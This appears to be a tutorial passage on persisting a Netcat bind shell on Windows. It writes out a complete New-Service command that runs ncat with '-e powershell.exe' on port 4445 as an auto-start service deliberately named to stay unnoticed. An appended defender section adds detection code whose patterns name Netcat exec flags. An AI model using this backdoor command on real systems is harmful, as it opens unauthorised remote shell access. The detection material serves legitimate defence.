Windows services offer us the possibility to execute our Netcat command automatically and hidden from the user. Before we start, let’s look at the official Microsoft documentation: New-Service - PowerShell | Microsoft Docs.

First, we want to use powershell.exe instead of cmd.exe for our connection. So swap the “-e cmd.exe” with “-e powershell.exe”.

To continue, we need the exact installation location of Netcat. With the command “where ncat”, we get the path and save it for later use.

Let’s build our New-Service command. We need the following parameters:

-BinaryPathName ‘“C:\Program Files (x86)\Nmap\ncat.exe” -lnp 4445 -e powershell.exe’
-Description “No one will know what I do with this name!”

Putting this all together we get the following command:

New-Service -BinaryPathName ‘“C:\Program Files (x86)\Nmap\ncat.exe” -lnp 4445 -e powershell.exe’ -DisplayName -Name “4hiddenbackdoor” -StartupType “Automatic” -Description “No one will know what I do with this name!”

Conclusions using Windows Services

Unfortunately, this approach will not work when adding a service to be running as an Administrator. In the screenshot you see, the first service will have no real privileges. The second service asks me to enter a password for the Administrator.

Using Windows Registry

After searching a bit around what other approach we could use, I came across this article called 10 Steps to Use NetCat as a Backdoor in Windows 7 System and thought, let’s give it a try. The author uses the Windows startup process to execute Netcat while Windows is logging in the user. But…
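
A defender-side check for the service-based persistence described above, as an added example that is not code from the original post: it flags services whose binary path starts a Netcat-style tool with an exec flag. The function names and the sample service records are assumptions constructed for illustration; the commented lines show how the same check could be pointed at a live host.

```powershell
# Added example (not from the original post). Sample records are constructed.
function Test-SuspiciousServicePath {
    param([string]$PathName)
    $tool = '\b(ncat|netcat|nc)(\.exe)?\b'          # Netcat-family binary names
    $exec = '\s(-e|--exec|-c|--sh-exec)\s'          # hands the socket to a program
    # -match is case-insensitive by default in PowerShell
    return ($PathName -match $tool) -and ($PathName -match $exec)
}

function Find-SuspiciousService {
    param([Parameter(Mandatory)][object[]]$Service)
    foreach ($s in $Service) {
        if (Test-SuspiciousServicePath -PathName $s.PathName) {
            [pscustomobject]@{
                Name      = $s.Name
                StartMode = $s.StartMode   # 'Auto' means it survives reboots
                RunsAs    = $s.StartName   # account the service runs under
                PathName  = $s.PathName
            }
        }
    }
}

# Constructed sample records shaped like Win32_Service objects.
$sample = @(
    [pscustomobject]@{
        Name = 'Spooler'; StartMode = 'Auto'; StartName = 'LocalSystem'
        PathName = 'C:\Windows\System32\spoolsv.exe'
    }
    [pscustomobject]@{
        Name = '4hiddenbackdoor'; StartMode = 'Auto'; StartName = 'LocalSystem'
        PathName = '"C:\Program Files (x86)\Nmap\ncat.exe" -lnp 4445 -e powershell.exe'
    }
)

# Only the second record is reported.
Find-SuspiciousService -Service $sample | Format-List

# On a live host: audit installed services, then service-install events
# (System log, event ID 7045, where Properties[1] is the image path).
# Find-SuspiciousService -Service (Get-CimInstance -ClassName Win32_Service)
# Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045 } |
#     Where-Object { Test-SuspiciousServicePath -PathName $_.Properties[1].Value }
```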